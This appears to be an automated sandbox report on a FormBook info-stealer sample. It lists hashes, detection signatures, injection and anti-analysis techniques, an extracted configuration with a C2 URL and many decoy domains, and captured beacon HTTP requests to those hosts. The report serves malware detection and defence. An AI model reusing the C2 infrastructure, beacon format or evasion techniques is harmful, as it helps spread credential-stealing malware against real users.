Windows Analysis Report
5tCYPTkM6b.exe

Overview

General Information

Sample Name: 5tCYPTkM6b.exe
Analysis ID: 562034
MD5: c2ca2ba9c38eb02217588662717ba6c3
SHA1: 8a897f24d2e564af2c2fcc272ab0cfbef10611b5
SHA256: 9af4d9ef8b2a850854ae23411d44d3603147c26898bca1010fd2f9b16f6d456e
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Multi AV Scanner detection for submitted file
Source: 5tCYPTkM6b.exe Virustotal: Detection: 39% Perma Link
Source: 5tCYPTkM6b.exe ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 Avira URL Cloud: Label: malware
Source: http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 Avira URL Cloud: Label: malware
Source: www.dreamschools.online/b80i/ Avira URL Cloud: Label: phishing
Source: http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 Avira URL Cloud: Label: malware
Source: http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 Avira URL Cloud: Label: phishing
Machine Learning detection for sample
Source: 5tCYPTkM6b.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.control.exe.486796c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.3.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 14.2.control.exe.53aa88.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.2.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 2.0.5tCYPTkM6b.exe.400000.1.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance
barindex
Uses 32bit PE files
Source: 5tCYPTkM6b.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00405D7C FindFirstFileA,FindClose, 0_2_00405D7C
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004053AA
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00402630 FindFirstFileA, 0_2_00402630

Software Vulnerabilities
barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 4x nop then pop edi 2_2_0040C40A
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 14_2_001DC40A

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.gooooooo.xyz
Source: C:\Windows\explorer.exe Domain query: www.carriewilliamsinc.com
Source: C:\Windows\explorer.exe Network Connect: 148.72.244.75 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yixuan5.com
Source: C:\Windows\explorer.exe Domain query: www.inslidr.com
Source: C:\Windows\explorer.exe Domain query: www.farmacymerchants.com
Source: C:\Windows\explorer.exe Network Connect: 156.246.248.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.gooooooo.xyz
Source: DNS query: www.postmoon.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.dreamschools.online/b80i/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.carriewilliamsinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1Host: www.gooooooo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.yixuan5.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1Host: www.farmacymerchants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 09:47:39 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f281b6-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 09:47:44 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 28 Jan 2022 09:47:47 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 09:48:06 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: 5tCYPTkM6b.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 5tCYPTkM6b.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.298803762.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.276761296.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374119582.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312026121.0000000006840000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.inslidr.com
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.carriewilliamsinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1Host: www.gooooooo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.yixuan5.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1Host: www.farmacymerchants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404F61

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
